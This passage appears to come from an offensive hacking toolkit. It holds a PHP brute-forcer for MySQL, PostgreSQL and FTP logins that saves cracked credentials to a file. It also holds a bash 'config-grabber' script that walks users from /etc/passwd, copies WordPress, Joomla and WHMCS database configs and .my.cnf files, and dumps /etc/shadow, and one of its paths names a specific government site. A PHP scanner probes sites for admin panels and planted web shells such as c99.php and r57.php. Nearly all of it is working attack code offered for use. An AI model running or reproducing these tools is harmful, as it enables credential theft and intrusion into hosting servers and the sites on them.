($sqlserver)\n"); 88 | fclose($rezult); 89 | 90 | } 91 | 92 | else 93 | { 94 | 95 | echo "Trying...\n"; 96 | 97 | } 98 | 99 | } 100 | } 101 | ########################################################################################## 102 | break; 103 | 104 | case 'postgresql': 105 | 106 | echo ($a="\033[1;31m\tPostgres BruteForce Coded By w0lgix\033[1;m\n"); 107 | sleep(2); 108 | 109 | 110 | if($host == null or $listuser == null or $listpass == null ){ 111 | system("clear"); 112 | echo $a; 113 | exit("Example: \n"); 114 | 115 | } 116 | 117 | $open = fopen($listuser, "r"); 118 | $read = fread($open, filesize($listuser)); 119 | fclose($open); 120 | 121 | $users = explode("\n", $read); 122 | 123 | 124 | $open1 = fopen($listpass, "r"); 125 | $read1 = fread($open1, filesize($listpass)); 126 | fclose($open1); 127 | 128 | $passs = explode("\n", $read1); 129 | 130 | 131 | foreach ($users as $user) { 132 | 133 | foreach ($passs as $pass) { 134 | 135 | //$dbconn3 = pg_connect("host=sheep port=5432 dbname=mary user=lamb password=foo"); 136 | 137 | if(@pg_connect("host=$host port=5432 dbname=public user=$user password=$pass")) 138 | { 139 | echo "\033[1;34mConnected Secssful\033[1;m\n"; 140 | echo "user is \033[1;33m$user\033[1;m and password is \033[1;35m$pass\033[1;m\n"; 141 | 142 | $rezult=fopen("rezult.txt", "a"); 143 | $write=fwrite($rezult, "[+]$host >> user:$user pass:$pass ($sqlserver)\n"); 144 | fclose($rezult); 145 | 146 | } 147 | 148 | else 149 | { 150 | 151 | echo "Trying...\n"; 152 | 153 | } 154 | 155 | } 156 | } 157 | 158 | break; 159 | 160 | ############################################################################################# 161 | 162 | case 'ftp': 163 | 164 | echo ($a="\033[1;31m\tftp BruteForce Coded By w0lgix\033[1;m\n"); 165 | 166 | error_reporting(0); 167 | //awk -F":" '{ print $1 }' /etc/passwd 168 | 169 | 170 | 171 | if($host == null or $listuser == null or $listpass == null ){ 172 | 173 | system('clear'); 174 | /* 175 | $path = getcwd(); 176 | system("awk -F':' '{ print $1 }' /etc/passwd > $path/users.txt"); 177 | */ 178 | echo $a; 179 | echo "Example: \n"; 180 | die(); 181 | 182 | } 183 | 184 | 185 | 186 | 187 | 188 | 189 | $open = fopen($listuser, 'r'); 190 | $read = fread($open, filesize($listuser)); 191 | fclose($open); 192 | 193 | $ftp_user_name1 = explode("\n", $read); 194 | 195 | foreach ($ftp_user_name1 as $users) { 196 | 197 | $open1 = fopen($listpass, 'r'); 198 | $read1 = fread($open1, filesize($listpass)); 199 | fclose($open1); 200 | $ftp_user_pass1 = explode("\n", $read1); 201 | 202 | foreach ($ftp_user_pass1 as $key) { 203 | 204 | // login with username and password 205 | $conn_id = ftp_connect($host); 206 | 207 | $login_result = ftp_login($conn_id, $users, $key); 208 | // check connection 209 | if ($login_result) { 210 | 211 | $open3 = fopen("rezult.txt", "a+"); 212 | $read3 = fwrite($open3, "[+]$host >> user:$users pass:$key ($sqlserver)\n"); 213 | fclose($open3); 214 | echo "\033[1;33m$users \t $key\n\033[1;m"; 215 | 216 | } 217 | else 218 | { 219 | 220 | echo "Trying...\n"; 221 | 222 | } 223 | 224 | } 225 | } 226 | 227 | break; 228 | 229 | 230 | default: 231 | echo "\tPostgres Or Mysql Or Ftp\n"; 232 | break; 233 | 234 | } 235 | 236 | ?> 237 | -------------------------------------------------------------------------------- /weblack.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/php5 2 | < 108 | \033[1;35m \_/\_/ \___/|_|\__, |_/_/\_\ 109 | \033[1;36m v1.0 |___/ 110 | \033[1;37m 111 | 112 | "; 113 | echo $ee; 114 | 115 | 116 | 117 | system("clear"); 118 | echo $art; 119 | 120 | 121 | 122 | 123 | $aa = exec("curl $site "."| grep value= "); 124 | 125 | 126 | echo trim($aa,"="); 127 | 128 | $b = array('value',' 636 | 637 | -------------------------------------------------------------------------------- /config-grabber.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | awk -F':' '{ print $1 }' /etc/passwd > passwd.txt 4 | passwd=`cat passwd.txt` 5 | mkdir config-sniper 6 | pwd=`pwd` 7 | wait 8 | for i in $passwd 9 | do 10 | 11 | cp /srv/www/pmc/$i.campinas.sp.gov.br/html/ $pwd/config-sniper/$i.txt 12 | cp /home/$i/public_html/includes/db_conn.php $pwd/config-sniper/$i.txt 13 | cp /home2/$i/public_html/includes/db_conn.php $pwd/config-sniper/$i.txt 14 | cp /home/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 15 | cp /home/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 16 | cp /home/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 17 | cp /home/$i/public_html/config.php $pwd/config-sniper/$i.txt 18 | cp /home/$i/public_html/database.php $pwd/config-sniper/$i.txt 19 | cp /home/$i/public_html/Database.php $pwd/config-sniper/$i.txt 20 | cp /home/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 21 | cp /home/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 22 | cp /home/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 23 | cp /home/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 24 | cp /home/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 25 | cp /home/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 26 | cp /home/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 27 | cp /home/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 28 | cp /home/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 29 | cp /home/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 30 | cp /home/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 31 | cp /home/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 32 | cp /home/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 33 | cp /home/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 34 | cp /home/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 35 | cp /home/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 36 | cp /home/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 37 | cp /home/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 38 | cp /home1/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 39 | cp /home1/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 40 | cp /home1/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 41 | cp /home1/$i/public_html/config.php $pwd/config-sniper/$i.txt 42 | cp /home1/$i/public_html/database.php $pwd/config-sniper/$i.txt 43 | cp /home1/$i/public_html/Database.php $pwd/config-sniper/$i.txt 44 | cp /home1/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 45 | cp /home1/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 46 | cp /home1/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 47 | cp /home1/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 48 | cp /home1/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 49 | cp /home1/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 50 | cp /home1/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 51 | cp /home1/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 52 | cp /home1/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 53 | cp /home1/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 54 | cp /home1/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 55 | cp /home1/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 56 | cp /home1/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 57 | cp /home1/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 58 | cp /home1/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 59 | cp /home1/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 60 | cp /home1/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 61 | cp /home1/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 62 | cp /home2/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 63 | cp /home2/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 64 | cp /home2/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 65 | cp /home2/$i/public_html/config.php $pwd/config-sniper/$i.txt 66 | cp /home2/$i/public_html/database.php $pwd/config-sniper/$i.txt 67 | cp /home2/$i/public_html/Database.php $pwd/config-sniper/$i.txt 68 | cp /home2/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 69 | cp /home2/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 70 | cp /home2/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 71 | cp /home2/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 72 | cp /home2/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 73 | cp /home2/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 74 | cp /home2/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 75 | cp /home2/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 76 | cp /home2/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 77 | cp /home2/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 78 | cp /home2/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 79 | cp /home2/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 80 | cp /home2/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 81 | cp /home2/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 82 | cp /home2/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 83 | cp /home2/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 84 | cp /home2/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 85 | cp /home2/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 86 | cp /home3/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 87 | cp /home3/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 88 | cp /home3/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 89 | cp /home3/$i/public_html/config.php $pwd/config-sniper/$i.txt 90 | cp /home3/$i/public_html/database.php $pwd/config-sniper/$i.txt 91 | cp /home3/$i/public_html/Database.php $pwd/config-sniper/$i.txt 92 | cp /home3/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 93 | cp /home3/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 94 | cp /home3/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 95 | cp /home3/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 96 | cp /home3/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 97 | cp /home3/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 98 | cp /home3/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 99 | cp /home3/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 100 | cp /home3/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 101 | cp /home3/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 102 | cp /home3/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 103 | cp /home3/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 104 | cp /home3/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 105 | cp /home3/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 106 | cp /home3/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 107 | cp /home3/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 108 | cp /home3/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 109 | cp /home3/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 110 | cp /home4/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 111 | cp /home4/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 112 | cp /home4/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 113 | cp /home4/$i/public_html/config.php $pwd/config-sniper/$i.txt 114 | cp /home4/$i/public_html/database.php $pwd/config-sniper/$i.txt 115 | cp /home4/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 116 | cp /home4/$i/public_html/Database.php $pwd/config-sniper/$i.txt 117 | cp /home4/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 118 | cp /home4/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 119 | cp /home4/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 120 | cp /home4/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 121 | cp /home4/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 122 | cp /home4/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 123 | cp /home4/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 124 | cp /home4/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 125 | cp /home4/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 126 | cp /home4/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 127 | cp /home4/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 128 | cp /home4/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 129 | cp /home4/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 130 | cp /home4/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 131 | cp /home4/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 132 | cp /home4/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 133 | cp /home4/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 134 | cp /home5/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 135 | cp /home5/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 136 | cp /home5/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 137 | cp /home5/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 138 | cp /home5/$i/public_html/config.php $pwd/config-sniper/$i.txt 139 | cp /home5/$i/public_html/database.php $pwd/config-sniper/$i.txt 140 | cp /home5/$i/public_html/Database.php $pwd/config-sniper/$i.txt 141 | cp /home5/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 142 | cp /home5/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 143 | cp /home5/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 144 | cp /home5/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 145 | cp /home5/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 146 | cp /home5/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 147 | cp /home5/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 148 | cp /home5/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 149 | cp /home5/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 150 | cp /home5/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 151 | cp /home5/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 152 | cp /home5/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 153 | cp /home5/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 154 | cp /home5/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 155 | cp /home5/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 156 | cp /home5/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 157 | cp /home5/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 158 | cp /var/www/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 159 | cp /var/www/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 160 | cp /var/www/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 161 | cp /var/www/$i/public_html/config.php $pwd/config-sniper/$i.txt 162 | cp /var/www/$i/public_html/database.php $pwd/config-sniper/$i.txt 163 | cp /var/www/$i/public_html/Database.php $pwd/config-sniper/$i.txt 164 | cp /var/www/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 165 | cp /var/www/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 166 | cp /var/www/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 167 | cp /var/www/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 168 | cp /var/www/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 169 | cp /var/www/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 170 | cp /var/www/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 171 | cp /var/www/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 172 | cp /var/www/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 173 | cp /var/www/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 174 | cp /var/www/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 175 | cp /var/www/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 176 | cp /var/www/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 177 | cp /var/www/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 178 | cp /var/www/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 179 | cp /var/www/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 180 | cp /var/www/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 181 | cp /var/www/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 182 | cp /var/www/html/$i/public_html/configuration.* $pwd/config-sniper/$i.txt 183 | cp /var/www/html/$i/public_html/*onfig.php $pwd/config-sniper/$i.txt 184 | cp /var/www/html/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 185 | cp /var/www/html/$i/public_html/config.php $pwd/config-sniper/$i.txt 186 | cp /var/www/html/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 187 | cp /var/www/html/$i/public_html/database.php $pwd/config-sniper/$i.txt 188 | cp /var/www/html/$i/public_html/Database.php $pwd/config-sniper/$i.txt 189 | cp /var/www/html/$i/public_html/wp/wp-config.php $pwd/config-sniper/$i.txt 190 | cp /var/www/html/$i/public_html/WP/wp-config.php $pwd/config-sniper/$i.txt 191 | cp /var/www/html/$i/public_html/press/wp-config.php $pwd/config-sniper/$i.txt 192 | cp /var/www/html/$i/public_html/Wordpress/wp-config.php $pwd/config-sniper/$i.txt 193 | cp /var/www/html/$i/public_html/blog/wp-config.php $pwd/config-sniper/$i.txt 194 | cp /var/www/html/$i/public_html/wordpress/beta/wp-config.php $pwd/config-sniper/$i.txt 195 | cp /var/www/html/$i/public_html/news/wp-config.php $pwd/config-sniper/$i.txt 196 | cp /var/www/html/$i/public_html/protal/configuration.php $pwd/config-sniper/$i.txt 197 | cp /var/www/html/$i/public_html/central/configuration.php $pwd/config-sniper/$i.txt 198 | cp /var/www/html/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 199 | cp /var/www/html/$i/public_html/submitticket.php $pwd/config-sniper/$i.txt 200 | cp /var/www/html/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 201 | cp /var/www/html/$i/public_html/main/configuration.php $pwd/config-sniper/$i.txt 202 | cp /var/www/html/$i/public_html/joomla/configuration.php $pwd/config-sniper/$i.txt 203 | cp /var/www/html/$i/public_html/cms/configuration.php $pwd/config-sniper/$i.txt 204 | cp /var/www/html/$i/public_html/home/configuration.php $pwd/config-sniper/$i.txt 205 | cp /var/www/html/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 206 | cp /home/sites/$i/public_html/config.php $pwd/config-sniper/$i.txt 207 | cp /home/sites/$i/public_html/lib/include.lib.php $pwd/config-sniper/$i.txt 208 | cp /home/sites/$i/public_html/include/config.php $pwd/config-sniper/$i.txt 209 | cp /home/sites/$i/public_html/wp-config.php $pwd/config-sniper/$i.txt 210 | cp /home/sites/$i/public_html/whm/WHMCS/configuration.php $pwd/config-sniper/$i.txt 211 | cp /home/sites/$i/public_html/whm/configuration.php $pwd/config-sniper/$i.txt 212 | cp /home/sites/$i/public_html/dbinfo.php $pwd/config-sniper/$i.txt 213 | cp /home/sites/$i/public_html/configuration.php $pwd/config-sniper/$i.txt 214 | cp /home/$i/public_html/dbinfo.php $pwd/config-sniper/$i.txt 215 | cp /var/www/$i/public_html/dbinfo.php $pwd/config-sniper/$i.txt 216 | cp /home1/$i/public_html/dbinfo.php $pwd/config-sniper/$i.txt 217 | ls -la /home/$i/public_html/ 218 | 219 | [ -r "/srv/www/pmc/$i.campinas.sp.gov.br/html/" ] && echo "/srv/www/pmc/$i.campinas.sp.gov.br/html/sites/default/files/" >> open-dir.txt 220 | [ -r "/home/$i/public_html" ] && echo "/home/$i/public_html/" >> open-dir.txt 221 | [ -r "/var/www/$i/public_html/" ] && echo "/var/www/$i/public_html/" >> open-dir.txt 222 | [ -r "/home1/www/$i/public_html/" ] && echo "/home1/$i/public_html/" >> open-dir.txt 223 | [ -r "/home2/www/$i/public_html/" ] && echo "/home2/$i/public_html/" >> open-dir.txt 224 | [ -r "/home3/www/$i/public_html/" ] && echo "/home3/$i/public_html/" >> open-dir.txt 225 | [ -r "/home3/www/$i/public_html/" ] && echo "/home3/$i/public_html/" >> open-dir.txt 226 | [ -r "/home4/$i/public_html/" ] && echo "/home4/$i/public_html/" >> open-dir.txt 227 | [ -r "/home5/$i/public_html/" ] && echo "/home5/$i/public_html/" >> open-dir.txt 228 | [ -r "/home/sites/$i/public_html/" ] && echo "/home/sites/$i/public_html/" >> open-dir.txt 229 | [ -r "/var/www/html/$i/public_html/" ] && echo "/var/www/html/$i/public_html/" >> open-dir.txt 230 | 231 | 232 | mkdir cpanels 233 | cat /home/$i/.my.cnf >> cpanels/cpanels.txt 234 | cat /var/$i/.my.cnf >> cpanels/cpanels.txt 235 | cat /var/www/$i/.my.cnf >> cpanels/cpanels.txt 236 | cat /home1/$i/.my.cnf >> cpanels/cpanels.txt 237 | cat /home2/$i/.my.cnf >> cpanels/cpanels.txt 238 | cat /home3/$i/.my.cnf >> cpanels/cpanels.txt 239 | cat /home4/$i/.my.cnf >> cpanels/cpanels.txt 240 | cat /home5/$i/.my.cnf >> cpanels/cpanels.txt 241 | cat /home6/$i/.my.cnf >> cpanels/cpanels.txt 242 | cat /var/www/html/$i/.my.cnf >> cpanels/cpanels.txt 243 | done 244 | 245 | grep '^zone' /etc/named.conf | cut -d'"' -f2 > named.txt 246 | cat /etc/shadow > shadow.txt 247 | cat /etc/hosts > hosts.txt 248 | ls /etc/valiases/ > named2.txt 249 | -------------------------------------------------------------------------------- /admin.php: -------------------------------------------------------------------------------- 1 | >\033[1;m"." \033[1;32mhttp://$site1/$path\033[1;m\n"; 106 | $open1 = fopen("rezultsite.txt", "a"); 107 | $write = fwrite($open1, "http://$site1/$path\n"); 108 | fclose($open1); 109 | } 110 | } 111 | 112 | } 113 | } 114 | 115 | else 116 | { 117 | 118 | $arr = array('http://','https://',''); 119 | $site1 = str_replace($arr, '', $sites); 120 | 121 | echo $art; 122 | 123 | 124 | $list = array ('/.get/','/db.sql','/Apanel/index.php','/apanel/index.php','/Administration/index.php','/swadmin/index.php','a2c_cms/index.php','/admin/cms.php','/spip.php','/admin/admin.php','/web.config.txt','/cms','/phpmyadmin/index.php','robots.txt','/phpinfo.php','/404.php','admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','/ 125 | admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 126 | 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 127 | 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 128 | 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 129 | 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 130 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 131 | 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 132 | 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 133 | 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 134 | 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 135 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 136 | 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 137 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 138 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 139 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 140 | 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 141 | 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 142 | 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php', 143 | 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','WSO.php','dz.php','a.php','wp-content/plugins/akismet/akismet.php','images/stories/w.php','w.php','shell.php','cpanel.php','cpn.php','sql.php','mysql.php','configuration.php','madspot.php','Cgishell.pl','killer.php','changeall.php','2.php','Sh3ll.php','dz0.php','dam.php','user.php','dom.php','whmcs.php','r00t.php','1.php','a.php','r0k.php','abc.php','egy.php','syrian_shell.php','xxx.php','settings.php','tmp.php','cyber.php','c99.php','r57.php','404.php','gaza.php','1.php','d4rk.php','index1.php','nkr.php','xd.php','M4r0c.php','Dz.php','sniper.php','ksa.php','v4team.php','offline.php','priv8.php','911.php','madspotshell.php','c100.php','sym.php','cp.php','tmp/cpn.php','tmp/w.php','tmp/r57.php','tmp/king.php','tmp/sok.php','tmp/ss.php','tmp/as.php','tmp/dz.php','tmp/r1z.php','tmp/whmcs.php','tmp/root.php','tmp/r00t.php','templates/beez/index.php','templates/beez/beez.php','templates/rhuk_milkyway/index.php','tmp/uploads.php','tmp/upload.php','tmp/sa.php','sa.php','readme.php','tmp/readme.php','wp.zip'.'wp-content/plugins/disqus-comment-system/disqus.php', 144 | 'd0mains.php','wp-content/plugins/akismet/akismet.php','madspotshell.php','info.php','egyshell.php','Sym.php','c22.php','c100.php', 145 | 'wp-content/plugins/akismet/admin.php#','g.php','wp-content/plugins/google-sitemap-generator/sitemap-core.php#', 146 | 'wp-content/plugins/akismet/widget.php#','xx.pl','ls.php','Cpanel.php','k.php','zone-h.php','tmp/user.php','tmp/Sym.php','cp.php', 147 | 'tmp/madspotshell.php','tmp/root.php','tmp/whmcs.php','tmp/index.php','tmp/2.php','tmp/dz.php','tmp/cpn.php', 148 | 'tmp/changeall.php','tmp/Cgishell.pl','tmp/sql.php','0day.php','tmp/admin.php','cliente/downloads/h4xor.php', 149 | 'whmcs/downloads/dz.php','L3b.php','d.php','tmp/d.php','tmp/L3b.php','wp-content/plugins/akismet/admin.php', 150 | 'templates/rhuk_milkyway/index.php','templates/beez/index.php','sado.php','admin1.php','upload.php','up.php','vb.zip','vb.rar', 151 | 'admin2.asp','uploads.php','sa.php','sysadmins/','admin1/','sniper.php','administration/Sym.php','images/Sym.php', 152 | '/r57.php','/wp-content/plugins/disqus-comment-system/disqus.php','gzaa_spysl','sql-new.php','/shell.php','/sa.php','/admin.php', 153 | '/sa2.php','/2.php','/gaza.php','/up.php','/upload.php','/uploads.php','/templates/beez/index.php','shell.php','/amad.php', 154 | '/t00.php','/dz.php','/site.rar','/Black.php','/site.tar.gz','/home.zip','/home.rar','/home.tar','/home.tar.gz', 155 | '/forum.zip','/forum.rar','/forum.tar','/forum.tar.gz','/test.txt','/ftp.txt','/user.txt','/site.txt','/error_log','/error', 156 | '/cpanel','/awstats','/site.sql','/vb.sql','/forum.sql','r00t-s3c.php','c.php','/backup.sql','/back.sql','/data.sql','wp.rar/', 157 | 'wp-content/plugins/disqus-comment-system/disqus.php','asp.aspx','/templates/beez/index.php','tmp/vaga.php', 158 | 'tmp/killer.php','whmcs.php','abuhlail.php','tmp/killer.php','tmp/domaine.pl','tmp/domaine.php','useradmin/', 159 | 'tmp/d0maine.php','d0maine.php','tmp/sql.php','X.php','123.php','m.php','b.php','up.php','tmp/dz1.php','dz1.php','forum.zip','Symlink.php','Symlink.pl', 160 | 